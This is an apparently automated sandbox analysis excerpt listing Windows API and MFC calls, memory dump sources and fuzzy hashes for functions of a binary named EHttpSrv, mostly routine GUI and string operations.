                                                                                                                • CreateFontIndirectW.GDI32 ref: 204133F1
                                                                                                                • #1271.MFC80U(00000000), ref: 204133FA
                                                                                                                  • Part of subcall function 20420530: #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 2042059A
                                                                                                                  • Part of subcall function 20420530: #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 204205BF
                                                                                                                  • Part of subcall function 20420530: GetSysColor.USER32(0000000E), ref: 204205E4
                                                                                                                  • Part of subcall function 20420530: GetSysColor.USER32(0000000D), ref: 204205EE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1271#1562#5609#6086#762#764ColorCreateFontIndirectRectWindow$#2362#4574MessageObjectSendmemset
                                                                                                                • String ID: n$xXH
                                                                                                                • API String ID: 3384984204-2023183603
                                                                                                                • Opcode ID: 95b6b9af0db05c157245e0d8950aaf6f032ba2113402e6f7531cd004fb3b278d
                                                                                                                • Instruction ID: df89eb388f3e077dc8a7648ceea616e3fc8ae983f4d044294edd22d2daf9c446
                                                                                                                • Opcode Fuzzy Hash: 95b6b9af0db05c157245e0d8950aaf6f032ba2113402e6f7531cd004fb3b278d
                                                                                                                • Instruction Fuzzy Hash: 34A14F71204700AFD720DBB4CC81FABB7E9BB88708F10891DF69E97291DB79A8458B55
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$_wcsnicmpmemcpy_smemmove_s
                                                                                                                • String ID: InstallDir$InstallDir32$ProductName$ProductVersion$ScannerVersion$x86\
                                                                                                                • API String ID: 308510788-164657748
                                                                                                                • Opcode ID: 9cfe9f924ec3093dbc28e29c1735e63e94f3565b95dd8854a8d1b24b8ed9160a
                                                                                                                • Instruction ID: 526b51a08f6c597bdb1942fb88777c362074db7fda32dca29dac90f820a139c1
                                                                                                                • Opcode Fuzzy Hash: 9cfe9f924ec3093dbc28e29c1735e63e94f3565b95dd8854a8d1b24b8ed9160a
                                                                                                                • Instruction Fuzzy Hash: 5CF117715083059BC7249BACCD49B9B73B4EF89308F09CA58ED4597342EB7CAB48C792
                                                                                                                APIs
                                                                                                                • #1472.MFC80U(?,FEEA6C22), ref: 20437007
                                                                                                                • #776.MFC80U(?), ref: 20437018
                                                                                                                • IsWindow.USER32(?), ref: 20437030
                                                                                                                • IsWindow.USER32(?), ref: 20437045
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 2043705E
                                                                                                                • SendMessageW.USER32(?,00001202,00000000,00000000), ref: 20437073
                                                                                                                • free.MSVCR80 ref: 20437087
                                                                                                                • malloc.MSVCR80 ref: 204370A5
                                                                                                                • GetClientRect.USER32(?,?), ref: 204370C5
                                                                                                                • #310.MFC80U ref: 204370D5
                                                                                                                • #1053.MFC80U(?,?,00000000,0000002C), ref: 204370EC
                                                                                                                • #310.MFC80U(?,?,00000000,0000002C), ref: 20437104
                                                                                                                • #1053.MFC80U(?,?,00000000,0000003D), ref: 2043711D
                                                                                                                • #774.MFC80U(?,?,?,00000000,0000003D), ref: 2043712F
                                                                                                                • #310.MFC80U(?,?,00000000,0000003D), ref: 20437139
                                                                                                                • #1053.MFC80U(?,?,00000001,0000003D), ref: 20437152
                                                                                                                • _wtol.MSVCR80 ref: 20437160
                                                                                                                • SendMessageW.USER32(?,0000120A,00000000,00000007), ref: 204371BF
                                                                                                                • #578.MFC80U ref: 204371CD
                                                                                                                • #578.MFC80U ref: 204371DC
                                                                                                                • #1053.MFC80U(?,?,-00000001,0000002C), ref: 204371EE
                                                                                                                • realloc.MSVCR80 ref: 20437210
                                                                                                                • #3395.MFC80U(00000000,0000002C), ref: 20437236
                                                                                                                • IsWindow.USER32(?), ref: 2043724D
                                                                                                                • SendMessageW.USER32 ref: 2043726C
                                                                                                                • SendMessageW.USER32(?,0000120B,-00000001,?), ref: 20437282
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 2043728A
                                                                                                                • SendMessageW.USER32(?,0000120C,-00000001,?), ref: 204372A3
                                                                                                                • GetClientRect.USER32(?,?), ref: 204372B5
                                                                                                                • #578.MFC80U(?,?,?,?,?,?,?,?,?,?,?), ref: 204372DF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1053$#310#578Window$ClientRect$#1472#3395#774#776MetricsSystem_wtolfreemallocrealloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579592575-0
                                                                                                                • Opcode ID: 020327350494e9c27d9f7df119326d8f05867bc4b03c744ac8ffc632b2ac4eb1
                                                                                                                • Instruction ID: 4bd2b81108923beed7dd3f4ad3a2f5b679cf4373aa46a76069290c78f9d96600
                                                                                                                • Opcode Fuzzy Hash: 020327350494e9c27d9f7df119326d8f05867bc4b03c744ac8ffc632b2ac4eb1
                                                                                                                • Instruction Fuzzy Hash: 7D915D712087019FE320DB65CC89F5BB7E8BB88745F108A1CF695972A0DB79E905CB52
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 204405E0
                                                                                                                  • Part of subcall function 2042C5B0: #4574.MFC80U(?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5B9
                                                                                                                  • Part of subcall function 2042C5B0: GetWindowRect.USER32(?,?), ref: 2042C5C7
                                                                                                                  • Part of subcall function 2042C5B0: #6063.MFC80U(?,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5E7
                                                                                                                  • Part of subcall function 2042C5B0: SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042C61C
                                                                                                                  • Part of subcall function 2042C5B0: GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042C630
                                                                                                                  • Part of subcall function 2042C5B0: #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C633
                                                                                                                  • Part of subcall function 2042C5B0: #2648.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C642
                                                                                                                  • Part of subcall function 2042C5B0: #1005.MFC80U(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C65C
                                                                                                                  • Part of subcall function 2042C5B0: GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042C66B
                                                                                                                  • Part of subcall function 2042C5B0: #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C66E
                                                                                                                  • Part of subcall function 2042C5B0: SetForegroundWindow.USER32(?), ref: 2042C681
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,00000000), ref: 2044062B
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000101), ref: 2044063C
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,00000000), ref: 2044065F
                                                                                                                • SendMessageW.USER32(?,00000151,00000001,?), ref: 2044067D
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,00000000), ref: 204406BA
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000102), ref: 204406CB
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,00000000), ref: 2044070A
                                                                                                                • SendMessageW.USER32(?,00000151,?,?), ref: 2044078A
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 204407A2
                                                                                                                • #310.MFC80U ref: 204407C3
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 20440800
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 20440812
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20440824
                                                                                                                • #6232.MFC80U(00000000), ref: 20440848
                                                                                                                • #776.MFC80U(?,?,?,00000000), ref: 2044098A
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 204409AC
                                                                                                                • SendMessageW.USER32(?,00000151,00000001,?), ref: 204409C0
                                                                                                                • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 20440A37
                                                                                                                • SendMessageW.USER32(?,00000150,00000001,00000000), ref: 20440A4F
                                                                                                                • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 20440A6B
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20440A8F
                                                                                                                • #6232.MFC80U(00000000), ref: 20440A95
                                                                                                                • #578.MFC80U(00000000), ref: 20440AAD
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20440ADB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2366#6232ItemNextWindow$#1005#2648#310#314#4574#578#6063#6751#776ForegroundRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253409394-0
                                                                                                                • Opcode ID: 1601a06762cacad1e8cbc559b100bd4cc02e4ed356e226a3da2df0017a5cfbef
                                                                                                                • Instruction ID: bc79db77f7d5a154e0c58ac83640ed0fa7abcad9e75eb80e817de5e5d5b50a70
                                                                                                                • Opcode Fuzzy Hash: 1601a06762cacad1e8cbc559b100bd4cc02e4ed356e226a3da2df0017a5cfbef
                                                                                                                • Instruction Fuzzy Hash: D1E17D71644301AFE304DF64CC95FA6B7E5BF98704F04896CFA889B291CA79F845CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2045DE90: #310.MFC80U(2045E5C1,000000FF,FEEA6C22,?,?,?,2047A422,000000FF,2045E5C1,?,?,FEEA6C22), ref: 2045DED5
                                                                                                                  • Part of subcall function 2045DE90: #310.MFC80U(?,?,?,2047A422,000000FF,2045E5C1,?), ref: 2045DEE3
                                                                                                                  • Part of subcall function 2042D2E0: #359.MFC80U(00000000,FEEA6C22), ref: 2042D320
                                                                                                                  • Part of subcall function 2042D2E0: memset.MSVCR80 ref: 2042D33C
                                                                                                                  • Part of subcall function 2042D2E0: #3998.MFC80U(?,00000000,FEEA6C22), ref: 2042D370
                                                                                                                  • Part of subcall function 2042D2E0: #6735.MFC80U(?,?,00000000,FEEA6C22), ref: 2042D382
                                                                                                                  • Part of subcall function 2042D2E0: #5832.MFC80U(?,?), ref: 2042D39F
                                                                                                                  • Part of subcall function 2042D2E0: #578.MFC80U(?,?), ref: 2042D3B0
                                                                                                                  • Part of subcall function 2042D2E0: #3828.MFC80U(?,00000000), ref: 2042D3C6
                                                                                                                  • Part of subcall function 2042D2E0: #2011.MFC80U(00000000,FEEA6C22), ref: 2042D3CD
                                                                                                                  • Part of subcall function 2042D2E0: #607.MFC80U(?,00000000), ref: 2042D3E3
                                                                                                                • #6735.MFC80U(?,?,?,FEEA6C22), ref: 2045E60D
                                                                                                                • #1476.MFC80U(?), ref: 2045E625
                                                                                                                • #578.MFC80U ref: 2045E63C
                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E6A4
                                                                                                                • #310.MFC80U ref: 2045E6D9
                                                                                                                • #4026.MFC80U(00000074), ref: 2045E6EE
                                                                                                                • #310.MFC80U ref: 2045E6F8
                                                                                                                • #4026.MFC80U(00000075), ref: 2045E70C
                                                                                                                • #4098.MFC80U(FEEA6C22,?,00000030), ref: 2045E720
                                                                                                                • #578.MFC80U(FEEA6C22,?,00000030), ref: 2045E730
                                                                                                                • #578.MFC80U ref: 2045E742
                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E7A5
                                                                                                                • wcsncpy_s.MSVCR80 ref: 2045E7C3
                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E81F
                                                                                                                • wcsncpy_s.MSVCR80 ref: 2045E836
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 2045E87D
                                                                                                                • #3873.MFC80U(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E897
                                                                                                                • #5869.MFC80U(00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E8B6
                                                                                                                • #5869.MFC80U(00000000,00000002,?,00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E8C8
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000002,?,00000000,00000001,?,00000001,00000000), ref: 2045E8E1
                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E944
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 2045E9CF
                                                                                                                • #3873.MFC80U(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E9E9
                                                                                                                • #5869.MFC80U(00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045EA08
                                                                                                                • #5869.MFC80U(00000000,00000002,?,00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045EA1A
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000002,?,00000000,00000001,?,00000001,00000000), ref: 2045EA33
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#578#5869wcscpy_s$#3873#4026#5862#6735MessageSendwcsncpy_s$#1476#2011#359#3828#3998#4098#5832#607memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 620450143-0
                                                                                                                • Opcode ID: be2954b327063b7d8bab526f765a60996450f9a67c5c262b95022e75a6c224ab
                                                                                                                • Instruction ID: 2ace1d11d9b7c476054775e1a2a1a61a5e23e676c5184643b28d972a46399677
                                                                                                                • Opcode Fuzzy Hash: be2954b327063b7d8bab526f765a60996450f9a67c5c262b95022e75a6c224ab
                                                                                                                • Instruction Fuzzy Hash: B5D1C0712487409BE324CB54CC82F9BB7E5FF98B04F14891CF69A9B2D1DB78A908C756
                                                                                                                APIs
                                                                                                                • #516.MFC80U(00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6,000000FF,204708CB,?,?,?,?), ref: 2045FDF4
                                                                                                                  • Part of subcall function 20421B70: #572.MFC80U(FEEA6C22,?,?,2047A038,000000FF,2042055C,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 20421B97
                                                                                                                • #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE3E
                                                                                                                • #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE50
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 2045FEB5
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 2045FEBA
                                                                                                                • #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FEBF
                                                                                                                • GetSysColor.USER32(00000005), ref: 2045FEC6
                                                                                                                • #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FED4
                                                                                                                  • Part of subcall function 20427250: #1079.MFC80U(?,FEEA6C22), ref: 2042728B
                                                                                                                  • Part of subcall function 20427250: #6749.MFC80U(?,?,FEEA6C22), ref: 20427297
                                                                                                                • LoadIconW.USER32(00000000,00007F00), ref: 2045FEF3
                                                                                                                • DestroyCursor.USER32(?), ref: 2045FF1E
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF07
                                                                                                                  • Part of subcall function 204353D0: #1079.MFC80U(?,FEEA6C22), ref: 2043540B
                                                                                                                  • Part of subcall function 204353D0: #6749.MFC80U(?,?,FEEA6C22), ref: 20435417
                                                                                                                  • Part of subcall function 204353D0: #1176.MFC80U(?,?,FEEA6C22), ref: 20435444
                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 2045FF2F
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 2045FF34
                                                                                                                • #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF39
                                                                                                                • GetSysColor.USER32(00000005), ref: 2045FF40
                                                                                                                • #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF4E
                                                                                                                • #1079.MFC80U(?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF60
                                                                                                                • #1058.MFC80U(00000171,0000000E,00000171,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF71
                                                                                                                • LoadIconW.USER32(00000000,00000171), ref: 2045FF77
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF83
                                                                                                                • #1079.MFC80U(?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF95
                                                                                                                • #1058.MFC80U(0000016F,0000000E,0000016F,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFA6
                                                                                                                • LoadIconW.USER32(00000000,0000016F), ref: 2045FFAC
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFB8
                                                                                                                • #1079.MFC80U(?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFCA
                                                                                                                • #1058.MFC80U(00000172,0000000E,00000172,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFDB
                                                                                                                • LoadIconW.USER32(00000000,00000172), ref: 2045FFE1
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$Load$IconMetricsSystem$#1058$#1555#310#416#557#6749ColorCursor$#1176#516#530#572#6003DestroyEmptyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 365691172-0
                                                                                                                • Opcode ID: b68f33bef7c4b2d6117d4029ba62b2bec84fb5b55f27a9dde17b4a188a7d711b
                                                                                                                • Instruction ID: fed8fed39bf988fa6bdc90078e62ecdff316e1d07a83c31df6cb4852490efdad
                                                                                                                • Opcode Fuzzy Hash: b68f33bef7c4b2d6117d4029ba62b2bec84fb5b55f27a9dde17b4a188a7d711b
                                                                                                                • Instruction Fuzzy Hash: 8951D670244741AFD220DBB4CC42FAB77E9AF99B18F01C91CF6555B2D1DEB8A804CB61
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 204249E5
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 204249F5
                                                                                                                • #4026.MFC80U(000000C5), ref: 20424A0D
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 20424A2B
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 20424A3F
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 20424A80
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 20424AB2
                                                                                                                • #310.MFC80U ref: 20424AF4
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 20424B10
                                                                                                                • #6063.MFC80U(?), ref: 20424B24
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424B7F
                                                                                                                • #6063.MFC80U(20485878), ref: 20424B8C
                                                                                                                • #2311.MFC80U(?,2048587C,?,20485878), ref: 20424B9F
                                                                                                                • #6063.MFC80U(?), ref: 20424BB3
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424C0F
                                                                                                                • #6063.MFC80U(20485878), ref: 20424C1C
                                                                                                                • #578.MFC80U ref: 20424C2D
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20424C4D
                                                                                                                • #6063.MFC80U(?), ref: 20424C79
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20424C9B
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424CD6
                                                                                                                • #6063.MFC80U(20485878), ref: 20424CE3
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20424CF3
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424D08
                                                                                                                • #6063.MFC80U(20485878), ref: 20424D15
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20424D25
                                                                                                                • #578.MFC80U(20485878,20485878), ref: 20424D3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#6063$#2311#310#578$#4026#4574
                                                                                                                • String ID:
                                                                                                                • API String ID: 862278329-0
                                                                                                                • Opcode ID: 33ffcb5ef148fcbb47d6eda2bfc9d0609dc9160fafeb3dc740121320e5d8c93d
                                                                                                                • Instruction ID: 9710f64e217feda51601e01967b19a54b8f6438b9182b9ff69744ec8206c4091
                                                                                                                • Opcode Fuzzy Hash: 33ffcb5ef148fcbb47d6eda2bfc9d0609dc9160fafeb3dc740121320e5d8c93d
                                                                                                                • Instruction Fuzzy Hash: 13A1F172A086459FDB24CF50CC80FEB77A9FB94708F40CA2DF9445B2A0DB78A904CB81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
